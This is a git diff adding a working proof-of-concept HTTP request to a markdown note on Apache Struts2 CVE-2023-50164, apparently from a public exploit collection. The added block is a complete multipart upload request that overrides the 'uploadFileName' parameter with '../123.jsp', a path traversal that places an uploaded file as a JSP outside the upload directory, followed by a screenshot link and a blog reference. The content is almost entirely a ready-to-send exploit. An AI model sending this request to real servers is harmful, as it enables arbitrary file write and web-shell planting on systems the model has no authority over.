diff --git a/Apache Struts2 CVE-2023-50164.md b/Apache Struts2 CVE-2023-50164.md
index 0b95a64..7206e5e 100644
--- a/Apache Struts2 CVE-2023-50164.md	
+++ b/Apache Struts2 CVE-2023-50164.md	
@@ -57,3 +57,38 @@ Content-Disposition: form-data; name="uploadFileName";
 ------WebKitFormBoundary5WJ61X4PRwyYKlip--
 
 ```
+
+```
+POST /untitled4_war_exploded/upload.action HTTP/1.1
+Host: localhost:8080
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Sec-Fetch-User: ?1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Content-Type: multipart/form-data; boundary=---------------------------299952630938737678921373326300
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Site: same-origin
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
+Sec-Fetch-Mode: navigate
+Origin: http://localhost:8080
+Sec-Fetch-Dest: document
+Cookie: JSESSIONID=4519C8974359B23EE133A5CEA707D7D0; USER_NAME_COOKIE=admin; SID_1=69cf26c6
+Referer: http://localhost:8080/untitled4_war_exploded/
+Content-Length: 63765
+
+-----------------------------299952630938737678921373326300
+Content-Disposition: form-data; name="Upload"; filename="12.txt"
+Content-Type: image/png
+
+111
+-----------------------------299952630938737678921373326300
+Content-Disposition: form-data; name="uploadFileName"; 
+Content-Type: text/plain
+
+../123.jsp
+-----------------------------299952630938737678921373326300--
+```
+![image](https://github.com/wy876/POC/assets/139549762/afd588e7-f552-46bf-a2de-6c568d0fc1a2)
+
+- https://blog.csdn.net/qq_18193739/article/details/134935865
+